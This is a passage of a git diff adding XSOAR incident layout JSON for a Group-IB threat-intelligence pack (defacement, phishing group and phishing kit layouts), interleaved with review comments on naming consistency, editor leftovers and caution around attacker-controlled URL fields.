"field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibtargetdomain", + "height": 22, + "id": "49eedcd0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibtargetdomainprovider", + "height": 22, + "id": "4f9a9570-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdefacedate", + "height": 22, + "id": "52975ab0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 8, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdefacecontacts", + "height": 22, + "id": "554bf360-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 9, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 2, + "x": 0, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-e58fd320-71a7-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibthreatactorid", + "height": 22, + "id": "20510600-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibthreatactorname", + "height": 22, + "id": "239cae90-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibthreatactorisapt", + "height": 22, + "id": "279cda10-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Threat Actor", + "static": false, + "w": 1, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-e81c2350-71a7-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "f2a5e450-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": 
"field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "f5f4e840-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "f8c4aa10-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "fcba9c60-71a7-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Attacks Deface Layout", + "name": "GIB Attacks Deface Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_Phishing_Group_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_Phishing_Group_Layout.json new file mode 100644 index 000000000000..5f79e9c80d17 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_Phishing_Group_Layout.json 
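Review bot: The "Information from Group-IB" section exposes `gibmirrorlink` and `gibdefacesiteurl`, which by their names point at a defaced page and a mirror of it — content that is attacker-controlled at the time of the incident. Whether these are rendered as clickable links is decided by the incident field definitions rather than by this layout, and those definitions are not in this hunk, so it is worth confirming that an analyst is not given a one-click path to a compromised site from the SOC workstation. Consider making the caveat explicit in the layout metadata, e.g. `"description": "Layout for GIB Attacks Deface. Mirror/site URL fields point at attacker-controlled pages; open only from an isolated browser."`, so anyone customising the layout sees it.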
@@ -0,0 +1,598 @@ +{ + "description": "Layout for GIB Attacks Phishing Group", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": 
true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 13 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 11 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + 
"sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 9 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 13 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 9 + }, + { + "displayType": "ROW", + "h": 3, + "hideName": false, + "i": "caseinfoid-754279f0-71a8-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 4, + "fieldId": "gibid", + "height": 22, + "id": "b2a49670-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibphishingbrand", + "height": 22, + "id": "dfc61020-7bf8-11ef-96a8-77b28953dd87", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibphishingobjectives", + "height": 22, + "id": "ef311e70-8246-11ef-a19b-c92b354e1f7d", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + 
"endCol": 4, + "fieldId": "gibphishingsources", + "height": 22, + "id": "f2cedea0-8246-11ef-a19b-c92b354e1f7d", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibphishingurls", + "height": 22, + "id": "fa275ce0-8246-11ef-a19b-c92b354e1f7d", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibportallink", + "height": 22, + "id": "e3f06950-8492-11ef-87c7-cfae65ac92d0", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 3, + "fieldId": "gibphishingkittable", + "height": 106, + "id": "69dbdc00-8247-11ef-a19b-c92b354e1f7d", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 2, + "x": 0, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-75f52820-71a8-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibthreatactorid", + "height": 22, + "id": "a881d4a0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibthreatactorname", + "height": 22, + "id": "ab77bc10-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Threat Actor Information", + "static": false, + "w": 1, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-76a31b60-71a8-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibphishingdateblocked", + "height": 22, + "id": "1ecdfe00-8247-11ef-a19b-c92b354e1f7d", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibphishingdateadded", + "height": 22, + "id": "21a84720-8247-11ef-a19b-c92b354e1f7d", + "index": 1, + "sectionItemType": "field", + "startCol": 0 
+ }, + { + "endCol": 2, + "fieldId": "gibphishingdatedetected", + "height": 22, + "id": "24215d70-8247-11ef-a19b-c92b354e1f7d", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Dates", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-772f07b0-71a8-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "87de9350-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "8ac8baf0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "8d95e4b0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "902edf10-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 0, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-b148e200-8246-11ef-a19b-c92b354e1f7d", + "items": [ + { + "endCol": 2, + "fieldId": "gibphishingdomain", + "height": 22, + "id": "b9c562e0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibphishingdomainpuny", + "height": 22, + "id": "d246ed80-8246-11ef-a19b-c92b354e1f7d", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibphishingdomainexpirationdate", + "height": 22, + "id": "d674b8b0-8246-11ef-a19b-c92b354e1f7d", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { 
+ "endCol": 2, + "fieldId": "gibphishingregistrar", + "height": 22, + "id": "d997a390-8246-11ef-a19b-c92b354e1f7d", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Domain Information", + "static": false, + "w": 1, + "x": 1, + "y": 4 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Attacks Phishing Group Layout", + "name": "GIB Attacks Phishing Group Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_Phishing_Kit_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_Phishing_Kit_Layout.json new file mode 100644 index 000000000000..7419b074b301 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Attacks_Phishing_Kit_Layout.json 
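Review bot: The Group-IB section title in this new layout, `"name": "Information from Group-IB"`, does not match the title the same commit settles on for the existing Brand Protection layouts, `"name": "Information from GIB"`, so analysts get two labels for the same kind of section across the pack; pick one spelling and use it in all of the new layouts in this patch. The new file also carries no `"marketplaces"` key, whereas the modified layouts keep `"marketplaces": ["xsoar"]`; if the omission is intentional it deserves a line in the pack notes, since the files otherwise look parallel. Within the "Information from Group-IB" section the `gibphishingkittable` item has `"endCol": 3` while every sibling uses `"endCol": 4`, which looks like a leftover from resizing rather than a deliberate narrower column, though I cannot confirm that from the JSON alone. The "Case Details" section jumps from `"index": 2` to `"index": 4`, which in the Compromised Account Group layout further down in this patch is where `dbotsource` sits, so either that field was dropped on purpose here or the indices should be renumbered.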
@@ -0,0 +1,493 @@ +{ + "description": "Layout for GIB Attacks Phishing Kit", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, 
+ "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 12 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 8 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 10 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 10 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 53, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 53, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 53, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 53, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 53, + "id": "incident-closed-field", + "index": 1, + 
"sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 8 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 12 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 8 + }, + { + "displayType": "ROW", + "h": 4, + "hideName": false, + "i": "caseinfoid-dfe3afe0-71a8-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "dropEffect": "move", + "endCol": 6, + "fieldId": "gibid", + "height": 22, + "id": "fdac8100-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "listId": "caseinfoid-dfe3afe0-71a8-11ef-8c49-f9d8b5e80cf6", + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibdatahash", + "height": 22, + "id": "03136870-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibdateofdetection", + "height": 22, + "id": 
"05ce1ba0-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "08f26610-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibphishingkitsource", + "height": 22, + "id": "13ffaef0-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "dropEffect": "move", + "endCol": 6, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "0bc498e0-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "listId": "caseinfoid-dfe3afe0-71a8-11ef-8c49-f9d8b5e80cf6", + "sectionItemType": "field", + "startCol": 0 + }, + { + "dropEffect": "move", + "endCol": 6, + "fieldId": "gibphishingkitemail", + "height": 22, + "id": "b05b4600-861d-11ef-a12e-8b698a04d813", + "index": 6, + "listId": "caseinfoid-dfe3afe0-71a8-11ef-8c49-f9d8b5e80cf6", + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibportallink", + "height": 22, + "id": "cc423f40-8492-11ef-87c7-cfae65ac92d0", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 6, + "fieldId": "gibdownloadedfromtable", + "height": 106, + "id": "feb92140-815a-11ef-84cc-d3c4e728b454", + "index": 8, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 3, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-e0915500-71a8-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "f2123a60-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "f4dc08c0-71a8-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 
+ },
+ {
+ "endCol": 2,
+ "fieldId": "gibreliability",
+ "height": 22,
+ "id": "f7864130-71a8-11ef-8c49-f9d8b5e80cf6",
+ "index": 2,
+ "sectionItemType": "field",
+ "startCol": 0
+ },
+ {
+ "endCol": 2,
+ "fieldId": "gibseverity",
+ "height": 22,
+ "id": "fa52a7a0-71a8-11ef-8c49-f9d8b5e80cf6",
+ "index": 3,
+ "sectionItemType": "field",
+ "startCol": 0
+ }
+ ],
+ "maxW": 3,
+ "minH": 1,
+ "moved": false,
+ "name": "Group-IB Evaluation",
+ "static": false,
+ "w": 1,
+ "x": 0,
+ "y": 2
+ }
+ ],
+ "type": "custom"
+ },
+ {
+ "id": "warRoom",
+ "name": "War Room",
+ "type": "warRoom"
+ },
+ {
+ "id": "workPlan",
+ "name": "Work Plan",
+ "type": "workPlan"
+ },
+ {
+ "id": "evidenceBoard",
+ "name": "Evidence Board",
+ "type": "evidenceBoard"
+ },
+ {
+ "id": "relatedIncidents",
+ "name": "Related Incidents",
+ "type": "relatedIncidents"
+ },
+ {
+ "id": "canvas",
+ "name": "Canvas",
+ "type": "canvas"
+ }
+ ]
+ },
+ "group": "incident",
+ "id": "GIB Attacks Phishing Kit Layout",
+ "name": "GIB Attacks Phishing Kit Layout",
+ "system": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Brand_Protection_Phishing_Kit_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Brand_Protection_Phishing_Kit_Layout.json
index 7a360b14fe64..e854b15a415c 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Brand_Protection_Phishing_Kit_Layout.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Brand_Protection_Phishing_Kit_Layout.json
@@ -396,7 +396,7 @@
 "minH": 1,
 "minW": 1,
 "moved": false,
- "name": "Information from GIB TIA",
+ "name": "Information from GIB",
 "static": false,
 "w": 2,
 "x": 0,
@@ -438,5 +438,7 @@
 "system": false,
 "version": -1,
 "fromVersion": "6.0.0",
- "marketplaces": ["xsoar"]
+ "marketplaces": [
+ "xsoar"
+ ]
 }
\ No newline at end of file
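Review bot: Three items in the "Information from Group-IB" section of the Phishing Kit layout (`gibid`, `gibdatelastseen`, `gibphishingkitemail`) carry `"dropEffect": "move"` and a `"listId"` that points back at their own section; that is drag-and-drop state the layout editor leaves behind rather than layout configuration, the other items in the same section and the other new layouts in this patch do not have it, and it should be stripped before the file is committed. In the "Timeline Information" section every item has `"height": 53`, while the same five fields use `"height": 22` in the Phishing Group and Compromised Account Group layouts; if taller rows are not intended, that is another editor artifact. The section title `"Information from Group-IB"` also differs from the `"Information from GIB"` label this same commit applies to the Brand Protection layouts, leaving the pack with two spellings of the same section.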
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Brand_Protection_Phishing_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Brand_Protection_Phishing_Layout.json
index 642e974e37e2..133974535a41 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Brand_Protection_Phishing_Layout.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Brand_Protection_Phishing_Layout.json
@@ -420,7 +420,7 @@
 "minH": 1,
 "minW": 1,
 "moved": false,
- "name": "Information from GIB TIA",
+ "name": "Information from GIB",
 "static": false,
 "w": 2,
 "x": 0,
@@ -462,5 +462,7 @@
 "system": false,
 "version": -1,
 "fromVersion": "6.0.0",
- "marketplaces": ["xsoar"]
+ "marketplaces": [
+ "xsoar"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Account_Group_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Account_Group_Layout.json
new file mode 100644
index 000000000000..ef8dfe8c29fc
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Compromised_Account_Group_Layout.json
